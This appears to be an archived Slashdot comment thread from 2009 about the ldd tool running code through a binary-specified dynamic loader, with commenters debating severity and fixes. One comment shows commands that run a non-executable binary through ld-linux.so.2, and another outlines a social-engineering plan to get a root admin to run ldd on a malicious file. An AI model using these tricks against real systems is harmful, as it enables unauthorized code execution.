<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873483</id>
	<title>1985 called, they want their exploit back</title>
	<author>uslinux.net</author>
	<datestamp>1256577000000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>4</modscore>
	<htmltext><p><a href="http://web.archive.org/web/20050211210119/http://reverse.lostrealm.com/protect/ldd.html" title="archive.org">http://web.archive.org/web/20050211210119/http://reverse.lostrealm.com/protect/ldd.html</a> [archive.org]</p></htmltext>
<tokenext>http : //web.archive.org/web/20050211210119/http : //reverse.lostrealm.com/protect/ldd.html [ archive.org ]</tokentext>
<sentencetext>http://web.archive.org/web/20050211210119/http://reverse.lostrealm.com/protect/ldd.html [archive.org]</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873773</id>
	<title>At least ldd checks the 'x' bit</title>
	<author>Anonymous</author>
	<datestamp>1256578620000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>cp<nobr> <wbr></nobr>/bin/bash<nobr> <wbr></nobr>/tmp</p><p>chmod -x<nobr> <wbr></nobr>/tmp/bash<br><nobr> <wbr></nobr>/lib/ld-linux.so.2<nobr> <wbr></nobr>/tmp/bash</p><p>runs<nobr> <wbr></nobr>/tmp/bash anyway</p></htmltext>
<tokenext>cp /bin/bash /tmpchmod -x /tmp/bash /lib/ld-linux.so.2 /tmp/bashruns /tmp/bash anyway</tokentext>
<sentencetext>cp /bin/bash /tmpchmod -x /tmp/bash /lib/ld-linux.so.2 /tmp/bashruns /tmp/bash anyway</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876949</id>
	<title>Re:Another WIN in WINdows</title>
	<author>ericfitz</author>
	<datestamp>1256549760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Which is a free download from Microsoft:<br><a href="http://msdn.microsoft.com/en-us/windows/bb980924.aspx?wt.svl=more\_downloads" title="microsoft.com">http://msdn.microsoft.com/en-us/windows/bb980924.aspx?wt.svl=more\_downloads</a> [microsoft.com]</p></htmltext>
<tokenext>Which is a free download from Microsoft : http : //msdn.microsoft.com/en-us/windows/bb980924.aspx ? wt.svl = more \ _downloads [ microsoft.com ]</tokentext>
<sentencetext>Which is a free download from Microsoft:http://msdn.microsoft.com/en-us/windows/bb980924.aspx?wt.svl=more\_downloads [microsoft.com]</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955</id>
	<title>Re:Another WIN in WINdows</title>
	<author>Anonymous</author>
	<datestamp>1256574660000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>4</modscore>
	<htmltext>depends.exe does exactly this and ships with the platform sdk.</htmltext>
<tokenext>depends.exe does exactly this and ships with the platform sdk .</tokentext>
<sentencetext>depends.exe does exactly this and ships with the platform sdk.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874481</id>
	<title>Re:Thorough research</title>
	<author>Anonymous</author>
	<datestamp>1256581740000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>4</modscore>
	<htmltext><p>One wonders why no one thought to add that to the manpage.</p></htmltext>
<tokenext>One wonders why no one thought to add that to the manpage .</tokentext>
<sentencetext>One wonders why no one thought to add that to the manpage.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873087</id>
	<title>The bug is not in the dynamic loader</title>
	<author>Skapare</author>
	<datestamp>1256575320000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>Actually, no.  The bug is NOT in the dynamic loader.  In particular, when the exploiting executable specifies a different dynamic loader in the binary interpreter field, then the system dynamic loader is not even involved.</p><p>RTFA again.  The exploit involves using a different dynamic loader.  The evil person has made a fake loader that does the evil deed.  That's NOT a bug, since it does what he (the evil person) wanted.</p><p>The bug is<nobr> <wbr></nobr>... at least partly<nobr> <wbr></nobr>... in the<nobr> <wbr></nobr>/usr/bin/ldd script.  The real source of the bug is in the thinking that every dynamic loader would do this and that no dynamic loader that failed to would ever be used.  That's saying that the design of doing it this way is what is buggy.</p><p>There are some possible fixes.  One fix is to make a program to replace<nobr> <wbr></nobr>/usr/bin/ldd that understand by itself how to parse and interpret all executables.  That might be done best via a new flag on the dynamic linker or dynamic loader programs.  This needs to work for all executable formats the system might need to work with.  Another fix is to provide for a list of allowed (trusted) dynamic loaders that would be enforced most likely by the kernel.  That list could be managed via a<nobr> <wbr></nobr>/proc entry that can only be written/appended to by root (and uses a built-in list prepared when the kernel was compiled, whenever that<nobr> <wbr></nobr>/proc entry list is empty).</p></htmltext>
<tokenext>Actually , no .
The bug is NOT in the dynamic loader .
In particular , when the exploiting executable specifies a different dynamic loader in the binary interpreter field , then the system dynamic loader is not even involved.RTFA again .
The exploit involves using a different dynamic loader .
The evil person has made a fake loader that does the evil deed .
That 's NOT a bug , since it does what he ( the evil person ) wanted.The bug is ... at least partly ... in the /usr/bin/ldd script .
The real source of the bug is in the thinking that every dynamic loader would do this and that no dynamic loader that failed to would ever be used .
That 's saying that the design of doing it this way is what is buggy.There are some possible fixes .
One fix is to make a program to replace /usr/bin/ldd that understand by itself how to parse and interpret all executables .
That might be done best via a new flag on the dynamic linker or dynamic loader programs .
This needs to work for all executable formats the system might need to work with .
Another fix is to provide for a list of allowed ( trusted ) dynamic loaders that would be enforced most likely by the kernel .
That list could be managed via a /proc entry that can only be written/appended to by root ( and uses a built-in list prepared when the kernel was compiled , whenever that /proc entry list is empty ) .</tokentext>
<sentencetext>Actually, no.
The bug is NOT in the dynamic loader.
In particular, when the exploiting executable specifies a different dynamic loader in the binary interpreter field, then the system dynamic loader is not even involved.RTFA again.
The exploit involves using a different dynamic loader.
The evil person has made a fake loader that does the evil deed.
That's NOT a bug, since it does what he (the evil person) wanted.The bug is ... at least partly ... in the /usr/bin/ldd script.
The real source of the bug is in the thinking that every dynamic loader would do this and that no dynamic loader that failed to would ever be used.
That's saying that the design of doing it this way is what is buggy.There are some possible fixes.
One fix is to make a program to replace /usr/bin/ldd that understand by itself how to parse and interpret all executables.
That might be done best via a new flag on the dynamic linker or dynamic loader programs.
This needs to work for all executable formats the system might need to work with.
Another fix is to provide for a list of allowed (trusted) dynamic loaders that would be enforced most likely by the kernel.
That list could be managed via a /proc entry that can only be written/appended to by root (and uses a built-in list prepared when the kernel was compiled, whenever that /proc entry list is empty).</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882541</id>
	<title>Re:Thorough research</title>
	<author>buchner.johannes</author>
	<datestamp>1256651220000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Last modified date of the page: Sat 12 Apr 2003</p></htmltext>
<tokenext>Last modified date of the page : Sat 12 Apr 2003</tokentext>
<sentencetext>Last modified date of the page: Sat 12 Apr 2003</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872969</id>
	<title>Cool and so what</title>
	<author>Anonymous</author>
	<datestamp>1256574720000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>On one hand that is a cool little hack.  But on the other hand, so what?  How many cases occur where even with social engineering will someone run ldd but not run the executable?  E.g. In the example most sysadmins would run the program itself anyway</p></htmltext>
<tokenext>On one hand that is a cool little hack .
But on the other hand , so what ?
How many cases occur where even with social engineering will someone run ldd but not run the executable ?
E.g. In the example most sysadmins would run the program itself anyway</tokentext>
<sentencetext>On one hand that is a cool little hack.
But on the other hand, so what?
How many cases occur where even with social engineering will someone run ldd but not run the executable?
E.g. In the example most sysadmins would run the program itself anyway</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873321</id>
	<title>Re:Specific to Linux?</title>
	<author>nextekcarl</author>
	<datestamp>1256576220000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><p>From what I can tell, you can't really fix this as it is what the program does (though I could be wrong). It runs the program to find out what libraries it requires. That's why there's a warning that tells you not to run this on an untrusted program (linked to in a post above). It's sort of like saying sudo is a vulnerability because it lets you run untrusted program code.</p></htmltext>
<tokenext>From what I can tell , you ca n't really fix this as it is what the program does ( though I could be wrong ) .
It runs the program to find out what libraries it requires .
That 's why there 's a warning that tells you not to run this on an untrusted program ( linked to in a post above ) .
It 's sort of like saying sudo is a vulnerability because it lets you run untrusted program code .</tokentext>
<sentencetext>From what I can tell, you can't really fix this as it is what the program does (though I could be wrong).
It runs the program to find out what libraries it requires.
That's why there's a warning that tells you not to run this on an untrusted program (linked to in a post above).
It's sort of like saying sudo is a vulnerability because it lets you run untrusted program code.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873807</id>
	<title>Rename it!</title>
	<author>mweather</author>
	<datestamp>1256578800000</datestamp>
	<modclass>Funny</modclass>
	<modscore>3</modscore>
	<htmltext>They should rename it iddqd in honour of this new feature.</htmltext>
<tokenext>They should rename it iddqd in honour of this new feature .</tokentext>
<sentencetext>They should rename it iddqd in honour of this new feature.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875405</id>
	<title>Re:Cool and so what</title>
	<author>Anonymous</author>
	<datestamp>1256586000000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>How many cases occur where even with social engineering will someone run ldd but not run the executable?</p></div></blockquote><p>Actually, this is one scenario:</p><ol> <li>send a user (perhaps, via spam) the evil binary (dancing\_bunnies);</li><li>they'll save it, try to run it, and it will (bogusly) complain about a missing library or two;</li><li>the user might then ask their admin for assistance &mdash; forwarding him the error message even;</li><li>there is a good chance, that the admin will try to use <tt>ldd</tt> to resolve the missing-library problem.</li><li>it is very likely, the admin will be root at the time, for otherwise he may be unable to access the user-owned executable due to the strict permissions, that mail-clients impose on the saved attachments...</li><li>depending on the payload in the executable, root executing it will mean...</li><li>Profit!</li></ol><p>This may not work against <em>all</em> users-admins combinations, but it does not have to &mdash; just against even a small percentage of them...</p></div>
	</htmltext>
<tokenext>How many cases occur where even with social engineering will someone run ldd but not run the executable ? Actually , this is one scenario : send a user ( perhaps , via spam ) the evil binary ( dancing \ _bunnies ) ; they 'll save it , try to run it , and it will ( bogusly ) complain about a missing library or two ; the user might then ask their admin for assistance    forwarding him the error message even ; there is a good chance , that the admin will try to use ldd to resolve the missing-library problem.it is very likely , the admin will be root at the time , for otherwise he may be unable to access the user-owned executable due to the strict permissions , that mail-clients impose on the saved attachments...depending on the payload in the executable , root executing it will mean...Profit ! This may not work against all users-admins combinations , but it does not have to    just against even a small percentage of them.. .</tokentext>
<sentencetext>How many cases occur where even with social engineering will someone run ldd but not run the executable?Actually, this is one scenario: send a user (perhaps, via spam) the evil binary (dancing\_bunnies);they'll save it, try to run it, and it will (bogusly) complain about a missing library or two;the user might then ask their admin for assistance — forwarding him the error message even;there is a good chance, that the admin will try to use ldd to resolve the missing-library problem.it is very likely, the admin will be root at the time, for otherwise he may be unable to access the user-owned executable due to the strict permissions, that mail-clients impose on the saved attachments...depending on the payload in the executable, root executing it will mean...Profit!This may not work against all users-admins combinations, but it does not have to — just against even a small percentage of them...
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872969</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876817</id>
	<title>I'm not some fancy linux programmer</title>
	<author>jim\_v2000</author>
	<datestamp>1256549340000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>and I mainly use Windows these days...but this seems like a none issue.  If someone can get their executable on your system, I'm sure that they can come up with a better way of running it than having you ldd it.  I mean, the fact that it's there means that you've downloaded untrustworthy software and are probably just going to run whatever it is anyway, and probably as root if it asks for it.</htmltext>
<tokenext>and I mainly use Windows these days...but this seems like a none issue .
If someone can get their executable on your system , I 'm sure that they can come up with a better way of running it than having you ldd it .
I mean , the fact that it 's there means that you 've downloaded untrustworthy software and are probably just going to run whatever it is anyway , and probably as root if it asks for it .</tokentext>
<sentencetext>and I mainly use Windows these days...but this seems like a none issue.
If someone can get their executable on your system, I'm sure that they can come up with a better way of running it than having you ldd it.
I mean, the fact that it's there means that you've downloaded untrustworthy software and are probably just going to run whatever it is anyway, and probably as root if it asks for it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873147</id>
	<title>Remember to Exit Stage Left</title>
	<author>Anonymous</author>
	<datestamp>1256575560000</datestamp>
	<modclass>Funny</modclass>
	<modscore>5</modscore>
	<htmltext><p><div class="quote"><p>I researched this subject thoroughly and found that it's almost completely undocumented.</p></div><p> Completely undocumented... &lt;CARUSO NAME="david" STYLE="csi/miami" SHADES="true"&gt;<nobr> <wbr></nobr>...until now. &lt;/CARUSO&gt;<br> <br>YEAAAAAAAAAH!</p></div>
	</htmltext>
<tokenext>I researched this subject thoroughly and found that it 's almost completely undocumented .
Completely undocumented... ...until now .
YEAAAAAAAAAH !</tokentext>
<sentencetext>I researched this subject thoroughly and found that it's almost completely undocumented.
Completely undocumented...  ...until now.
YEAAAAAAAAAH!
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875209</id>
	<title>Re:Thorough research</title>
	<author>Omnifarious</author>
	<datestamp>1256585160000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p>Most programs that run other programs actually run them in an obvious fashion.  The fact that ldd doesn't seem to run the program because it feeds the program an environment variable that causes the program to print out some information and exit leads people to make a bad assumption about how ldd works.  In my opinion, this is a really bad design flaw in ldd and should've been fixed years ago.</p><p>I know it violated my assumptions about what ldd was doing.</p></htmltext>
<tokenext>Most programs that run other programs actually run them in an obvious fashion .
The fact that ldd does n't seem to run the program because it feeds the program an environment variable that causes the program to print out some information and exit leads people to make a bad assumption about how ldd works .
In my opinion , this is a really bad design flaw in ldd and should 've been fixed years ago.I know it violated my assumptions about what ldd was doing .</tokentext>
<sentencetext>Most programs that run other programs actually run them in an obvious fashion.
The fact that ldd doesn't seem to run the program because it feeds the program an environment variable that causes the program to print out some information and exit leads people to make a bad assumption about how ldd works.
In my opinion, this is a really bad design flaw in ldd and should've been fixed years ago.I know it violated my assumptions about what ldd was doing.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29881297</id>
	<title>Dont run  ldd as root</title>
	<author>Anonymous</author>
	<datestamp>1256673660000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>If some one says his program cannot work, one should test it with his user-id, not root</p></htmltext>
<tokenext>If some one says his program can not work , one should test it with his user-id , not root</tokentext>
<sentencetext>If some one says his program cannot work, one should test it with his user-id, not root</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876675</id>
	<title>Re:Nasty</title>
	<author>Anonymous</author>
	<datestamp>1256548800000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Err... You're a sysadmin; you run a system with users on it; a user asks you to check an issue (s)he's having with his code/account; after su to root (assuming you're following best practices and not permanently logged in as such), su -  &amp;&amp; debug.</p><p>I don't understand why would you su to root at any point after running user code (in fact, after you did it the first time from your account).</p><p>The sandbox isn't needed, a user can run ldd on his own code; so can you, safely, after changing your privileges to his/her's.</p></htmltext>
<tokenext>Err... You 're a sysadmin ; you run a system with users on it ; a user asks you to check an issue ( s ) he 's having with his code/account ; after su to root ( assuming you 're following best practices and not permanently logged in as such ) , su - &amp;&amp; debug.I do n't understand why would you su to root at any point after running user code ( in fact , after you did it the first time from your account ) .The sandbox is n't needed , a user can run ldd on his own code ; so can you , safely , after changing your privileges to his/her 's .</tokentext>
<sentencetext>Err... You're a sysadmin; you run a system with users on it; a user asks you to check an issue (s)he's having with his code/account; after su to root (assuming you're following best practices and not permanently logged in as such), su -  &amp;&amp; debug.I don't understand why would you su to root at any point after running user code (in fact, after you did it the first time from your account).The sandbox isn't needed, a user can run ldd on his own code; so can you, safely, after changing your privileges to his/her's.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872997</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882577</id>
	<title>Re:And the point is...</title>
	<author>buchner.johannes</author>
	<datestamp>1256651460000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>So, firstly, don't run ldd as root. (I use sudo, so no issues there.)</p><p>Secondly, don't use ldd on untrusted binaries. If you don't trust it why are you trying to run it?</p></div><p>As others have pointed out, no one is trying to run the binary. ldd doesn't execute the binary either, but the linker referenced in it.</p></div>
	</htmltext>
<tokenext>So , firstly , do n't run ldd as root .
( I use sudo , so no issues there .
) Secondly , do n't use ldd on untrusted binaries .
If you do n't trust it why are you trying to run it ? As others have pointed out , no one is trying to run the binary .
ldd does n't execute the binary either , but the linker referenced in it .</tokentext>
<sentencetext>So, firstly, don't run ldd as root.
(I use sudo, so no issues there.
)Secondly, don't use ldd on untrusted binaries.
If you don't trust it why are you trying to run it?As others have pointed out, no one is trying to run the binary.
ldd doesn't execute the binary either, but the linker referenced in it.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872983</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872967</id>
	<title>User can choose to run arbitrary code...</title>
	<author>alexhs</author>
	<datestamp>1256574720000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>Damn,</p><p>Asking the user to install dancing\_bunnies was too easy for this guy, he wants to ask the user to ldd dancing\_bunnies to activate the malware.</p><p>Could as well ask the user to ACTIVATE\_MALWARE=1 dancing\_bunnies or LD\_PRELOAD=dancing\_bunnies.so your\_app for letting the user running the malware from any your\_app he likes.</p></htmltext>
<tokenext>Damn,Asking the user to install dancing \ _bunnies was too easy for this guy , he wants to ask the user to ldd dancing \ _bunnies to activate the malware.Could as well ask the user to ACTIVATE \ _MALWARE = 1 dancing \ _bunnies or LD \ _PRELOAD = dancing \ _bunnies.so your \ _app for letting the user running the malware from any your \ _app he likes .</tokentext>
<sentencetext>Damn,Asking the user to install dancing\_bunnies was too easy for this guy, he wants to ask the user to ldd dancing\_bunnies to activate the malware.Could as well ask the user to ACTIVATE\_MALWARE=1 dancing\_bunnies or LD\_PRELOAD=dancing\_bunnies.so your\_app for letting the user running the malware from any your\_app he likes.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873815</id>
	<title>Re:Risk assessment</title>
	<author>Tetsujin</author>
	<datestamp>1256578860000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Seems to me it would be easier to convince my sysadmin to simply run a program of my choice.</p></div><p>It all depends on how gullible your sysadmin is...</p><p>Obviously a sysadmin should be wary of following anybody's suggestions on what to do with the superuser account...  But I think it requires less of a sharp mind to recognize "please run this program" as a threat as opposed to "please tell me what's gone wrong with this program"...</p><p>Deniability doesn't count for much - if the sysadmin thinks you're trying to sucker them, they could come up with a way to find out what that executable does (like run it through "strings" or set up some kind of safe testing environment and run it under "strace") - if they find it does something nasty, then it doesn't matter whether you tried to hide it in a dynamic loader hack or not.</p></div>
	</htmltext>
<tokenext>Seems to me it would be easier to convince my sysadmin to simply run a program of my choice.It all depends on how gullible your sysadmin is...Obviously a sysadmin should be wary of following anybody 's suggestions on what to do with the superuser account... But I think it requires less of a sharp mind to recognize " please run this program " as a threat as opposed to " please tell me what 's gone wrong with this program " ...Deniability does n't count for much - if the sysadmin thinks you 're trying to sucker them , they could come up with a way to find out what that executable does ( like run it through " strings " or set up some kind of safe testing environment and run it under " strace " ) - if they find it does something nasty , then it does n't matter whether you tried to hide it in a dynamic loader hack or not .</tokentext>
<sentencetext>Seems to me it would be easier to convince my sysadmin to simply run a program of my choice.It all depends on how gullible your sysadmin is...Obviously a sysadmin should be wary of following anybody's suggestions on what to do with the superuser account...  But I think it requires less of a sharp mind to recognize "please run this program" as a threat as opposed to "please tell me what's gone wrong with this program"...Deniability doesn't count for much - if the sysadmin thinks you're trying to sucker them, they could come up with a way to find out what that executable does (like run it through "strings" or set up some kind of safe testing environment and run it under "strace") - if they find it does something nasty, then it doesn't matter whether you tried to hide it in a dynamic loader hack or not.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873463</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874729</id>
	<title>So what?</title>
	<author>ledow</author>
	<datestamp>1256583000000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>In other news, "nice" is considered dangerous because when you run nice with the command line parameter of a program, it executes the program!  And crond.  And at.  And sudo.  And bash.  And a million script files.</p><p>This isn't shocking, it's stupid.  Possibly slightly unexpected if you're a new admin, that's about it.</p></htmltext>
<tokenext>In other news , " nice " is considered dangerous because when you run nice with the command line parameter of a program , it executes the program !
And crond .
And at .
And sudo .
And bash .
And a million script files.This is n't shocking , it 's stupid .
Possibly slightly unexpected if you 're a new admin , that 's about it .</tokentext>
<sentencetext>In other news, "nice" is considered dangerous because when you run nice with the command line parameter of a program, it executes the program!
And crond.
And at.
And sudo.
And bash.
And a million script files.This isn't shocking, it's stupid.
Possibly slightly unexpected if you're a new admin, that's about it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876293</id>
	<title>No magical OpenBSD fix?</title>
	<author>metrix007</author>
	<datestamp>1256590380000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>OpenBSD normally fixes stuff ~6 months before most vendors, are they vulnerable to this attack?</p></htmltext>
<tokenext>OpenBSD normally fixes stuff ~ 6 months before most vendors , are they vulnerable to this attack ?</tokentext>
<sentencetext>OpenBSD normally fixes stuff ~6 months before most vendors, are they vulnerable to this attack?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876933</id>
	<title>Re:Another WIN in WINdows</title>
	<author>MikeBabcock</author>
	<datestamp>1256549700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Since ldd ships with glibc-common on my system, I'm quite certain its a lot more common than the platform SDK is on Windows computers.</p></htmltext>
<tokenext>Since ldd ships with glibc-common on my system , I 'm quite certain its a lot more common than the platform SDK is on Windows computers .</tokentext>
<sentencetext>Since ldd ships with glibc-common on my system, I'm quite certain its a lot more common than the platform SDK is on Windows computers.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875557</id>
	<title>This is an obvious rip off</title>
	<author>Anonymous</author>
	<datestamp>1256586720000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This is an obvious rip off of already available information, e.g.</p><p># Security says:<br>October 26th, 2009 at 6:51 pm</p><p>This is an obvious copy of <a href="http://reverse.lostrealm.com/protect/ldd.html" title="lostrealm.com" rel="nofollow">http://reverse.lostrealm.com/protect/ldd.html</a> [lostrealm.com]<br># Security says:<br>October 26th, 2009 at 6:52 pm</p><p>Including this information from Debian (Feb 2009):</p><p>Debian Bug report logs - #514408<nobr> <wbr></nobr>/usr/bin/ldd: ldd manpage fails to mention security implications</p><p><a href="http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514408" title="debian.org" rel="nofollow">http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514408</a> [debian.org]</p><p>The are many projects which try to handle this issues, like<br>gcc hardening<br>selinux<br>and other security kernel patches</p></htmltext>
<tokenext>This is an obvious rip off of already available information , e.g. # Security says : October 26th , 2009 at 6 : 51 pmThis is an obvious copy of http : //reverse.lostrealm.com/protect/ldd.html [ lostrealm.com ] # Security says : October 26th , 2009 at 6 : 52 pmIncluding this information from Debian ( Feb 2009 ) : Debian Bug report logs - # 514408 /usr/bin/ldd : ldd manpage fails to mention security implicationshttp : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug = 514408 [ debian.org ] The are many projects which try to handle this issues , likegcc hardeningselinuxand other security kernel patches</tokentext>
<sentencetext>This is an obvious rip off of already available information, e.g.# Security says:October 26th, 2009 at 6:51 pmThis is an obvious copy of http://reverse.lostrealm.com/protect/ldd.html [lostrealm.com]# Security says:October 26th, 2009 at 6:52 pmIncluding this information from Debian (Feb 2009):Debian Bug report logs - #514408 /usr/bin/ldd: ldd manpage fails to mention security implicationshttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514408 [debian.org]The are many projects which try to handle this issues, likegcc hardeningselinuxand other security kernel patches</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872999</id>
	<title>Don't worry...</title>
	<author>wandazulu</author>
	<datestamp>1256574900000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext><p>...I'm sure someone will find some other vulnerability.</p></htmltext>
<tokenext>...I 'm sure someone will find some other vulnerability .</tokentext>
<sentencetext>...I'm sure someone will find some other vulnerability.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29879279</id>
	<title>to ldd, or not to ldd</title>
	<author>Bent Spoke</author>
	<datestamp>1256562060000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>
Presumably, one puts a binary on their system
because they intend to execute it.
In fact one mainly uses ldd <b>after</b> executing a program,
and getting a missing library message.
</p><p>
If ldd was a virus scanner, this would be a big deal.
But come on, accepting a binary from an untrusted source
onto your system is asking for it, even if ldd didn't do this.</p></htmltext>
<tokenext>Presumably , one puts a binary on their system because they intend to execute it .
In fact one mainly uses ldd after executing a program , and getting a missing library message .
If ldd was a virus scanner , this would be a big deal .
But come on , accepting a binary from an untrusted source onto your system is asking for it , even if ldd did n't do this .</tokentext>
<sentencetext>
Presumably, one puts a binary on their system
because they intend to execute it.
In fact one mainly uses ldd after executing a program,
and getting a missing library message.
If ldd was a virus scanner, this would be a big deal.
But come on, accepting a binary from an untrusted source
onto your system is asking for it, even if ldd didn't do this.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876259</id>
	<title>When you've run out of 0day remote exploits..</title>
	<author>synthesizerpatel</author>
	<datestamp>1256590260000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>This is the kind of stuff you get.</p><p>Any exploit that requires a local shell is 'Zzzzzzz'.</p><p>And something as contrived as getting root by social engineering someone to use ldd.. Is that so much easier than just kidnapping the system admins family and exchanging them for the root password? C'mon. Work for it.</p></htmltext>
<tokenext>This is the kind of stuff you get.Any exploit that requires a local shell is 'Zzzzzzz'.And something as contrived as getting root by social engineering someone to use ldd.. Is that so much easier than just kidnapping the system admins family and exchanging them for the root password ?
C'mon. Work for it .</tokentext>
<sentencetext>This is the kind of stuff you get.Any exploit that requires a local shell is 'Zzzzzzz'.And something as contrived as getting root by social engineering someone to use ldd.. Is that so much easier than just kidnapping the system admins family and exchanging them for the root password?
C'mon. Work for it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874419</id>
	<title>The problem is the executable</title>
	<author>Anonymous</author>
	<datestamp>1256581560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>The problem is that we're running a compromised executable. Once someone can get that into the system, it's over. Now it sounds like ldd is being used here possibly for increased privileges, but that's all. The real challenge is getting someone a compromised executable.</htmltext>
<tokenext>The problem is that we 're running a compromised executable .
Once someone can get that into the system , it 's over .
Now it sounds like ldd is being used here possibly for increased privileges , but that 's all .
The real challenge is getting someone a compromised executable .</tokentext>
<sentencetext>The problem is that we're running a compromised executable.
Once someone can get that into the system, it's over.
